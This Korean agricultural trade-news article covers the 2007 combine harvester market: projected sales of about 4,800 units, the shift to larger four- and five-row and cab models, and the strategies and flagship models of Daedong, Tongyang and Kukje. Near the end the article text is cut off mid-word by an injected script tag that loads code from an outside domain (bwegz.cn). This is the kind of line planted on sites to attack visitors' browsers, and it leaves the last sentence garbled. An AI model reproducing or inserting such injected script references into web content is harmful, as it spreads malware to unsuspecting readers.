-대형화, 첨단화 추세속 올 4800여대 판매 계획

입추를 지나 처서(處暑)와 백로(白露)를 목전에 두고 있는 요즈음, 농기계시장은 콤바인 판촉전으로 뜨겁게 달아오르고 있다. 특히 올해에는 시장선점을 놓고 이미 이앙시즌이 끝나는 시점에서부터 업체별로 전국순회전시를 갖는 등 콤바인 판촉전에 열을 올리고 있다.

2007년 업계에서 밝힌 콤바인 판매계획을 보면 약 4800여대로 지난해 판매실적 4300대보다 약 12%가량이 늘어난 수치여서 판촉경쟁 과열현상과 재고누적은 피하기 힘들 것으로 예측된다.

특히 올해 들어 한국시장 직판체제를 구축한 일본 얀마의 판매추이, 국산유일 동양 5조 콤바인의 선전여부, 얀마와 결별한 국제의 단독행보 등이 2007콤바인 시장 관전 포인트로 나타나고 있다.

콤바인 판매추세는 대형화, 첨단화 추세를 보이고 있다.
지난해까지 20여대를 판매하며 명목을 유지하던 2조식의 경우 올해 들어 단종됐으며 3조식도 감소추세를 보이고 있다. 4조식은 전체 물량의 약 80%를 차지해 주력기종으로 나타나고 있으며 5·6조의 경우 주로 프로 임작업농 등 소수에서 꾸준한 수요를 보이고 있다.

한편 콤바인의 주력 소비층이 일반농가에서 대형농가나 위탁영농법인, 임작업농 등으로 이동함에 따라 출력이 높고, 탈곡통의 사이즈가 커지는 형태의 고효율제품과 작업환경을 고려한 캐빈형의 선호도가 급격히 늘어나는 추세에 있다. 각 업체별 판매전략과 대표제품을 소개한다.

[대동공업 www.daedong.co.kr]
# 판매전략 = 대동공업은 차별화된 서비스와 다양한 제품라인업에 승부수를 두고 있다. 대동공업은 ‘50시간 점검서비스’를 실시하고 있는데 4조 콤바인 이상 제품에 대해 구매후 50시간이 지난 후에 기대의 기본적인 조정 및 각종 소모성 오일류, 필터류를 무상교체해주고 있다. 또한 DSM70G, DSM65시리즈, DSM48시리즈 등 다양한 4조 콤바인과 3조 콤바안 DSM41시리즈, 얀마수입콤바인 AW465K, AW580K, AW695K 등 소비자 선택의 폭을 최대한 넓혔다.
# 대표모델 DSM70G = 1.52m/s로 국내 최고의 속도를 갖춘 대동 DSM70G 콤바인은 탈곡통의 길이를 900mm까지 확장해 급치 선단부의 형상을 개선하고 철판 프레스 수망을 장착해 탈곡성능을 크게 향상시켰다. 국내 최초로 레버용 서보 HST를 별도 장착해 부드러운 레버 조작을 가능케 했으며 비확장식 1400리터의 곡물탱크, 수평제어 장치를 갖췄다. 또 오토 리프트 등의 다양한 자동화장치, 통합 콘트롤러는 작업성능 뿐 아니라 정비편의성 까지도 배려한 것을 엿볼 수 있다.

[동양물산기업 www.tym.co.kr]
# 판매전략 = 동양물산은 국내업체중 유일하게 5조 콤바인을 생산하는 기술력을 바탕으로 콤바인 시장을 선도한다는 전략이다. 특히 신형 5조 콤바인에 대한 대리점 및 농협 담당자 교육을 강화하고 각 지역별 연전시를 통한 실수요자 홍보에 집중한다는 방침이다. 또한 한정된 수요의 한계극복을 위해 연초부터 공격적인 마케팅을 펼치고 있다. 5조 콤바인은 고성능 출력으로 임작업용으로도 충분해 수입제품 대체 효과가 클 것으로 기대하고 있다. 동양은 4조 콤바인과의 차별성을 적극 홍보하고 사전서비스와 수리정비 교육 등을 통해 고객만족을 극대화키로 했다.
# 대표모델 C805G/C = 국내유일의 국산 5조 콤바인으로 고출력과 선별능력 극대화를 특징으로 한다. 85마력 일본 얀마엔진을 장착, 여유로운 출력으로 고속 및 습전작업 등에서 그 진가를 발휘한다. 또 고속작업시 선별능력향상을 위해 2번 팬을 채택, 대량의 곡립에도 여유가 있으며 선별능력을 극대화해 손실미를 최소화 했다. 기존 수동작동하던 곡물배출 시스템도 오거선단부에 조작스위치를 부착해 작업보조자가 직접 곡물배출 작업을 할 수 있도록 했으며 곡물배출속도도 기존 2분30초에서 2분대로 단축시켰다.

[국제종합기계 www.kukje21.co.kr]
# 판매전략 = 국제종합기계는 전국적인 콤바인 품평회, 무료자원봉사 실시 등 고객밀착 판매전략을 포인트로 삼았다. 국제는 연전시팀(특수사업팀)을 구축해 영업소 및 대리점 등을 통해 대리점과 고객들에게 제품에 대한 성능을 눈으로 확인시켜주는 콤바인 품평회 및 설명회를 실시한다. 또한 직접 국제 콤바인으로 수확작업을 하며 설명을 하는 콤바인 무료자원봉사를 실시하고, A/S전문담당기사를 적극적으로 활용하고 고객설문조사를 실시하는 등 지속적인 제품 업그레이드와 피드백을 실시한다.
# 대표모델 DKC685C(P) = 국내유일의 고강도 내식성 용융아연도금 강판을 채택한 국제 DKC685C(P)는 고효율 66마력 커민스엔진을 장착했다. 캐빈내 엔진점검이 가능하도록 점검창을 추가로 설치해 점검편의성을 높였으며 주요 배선부 방서테이프 부착으로 쥐로 인한 피해를 차?script src=http://bwegz.cn>
저작권자 © 농수축산신문 무단전재, 재배포 및 AI학습 이용 금지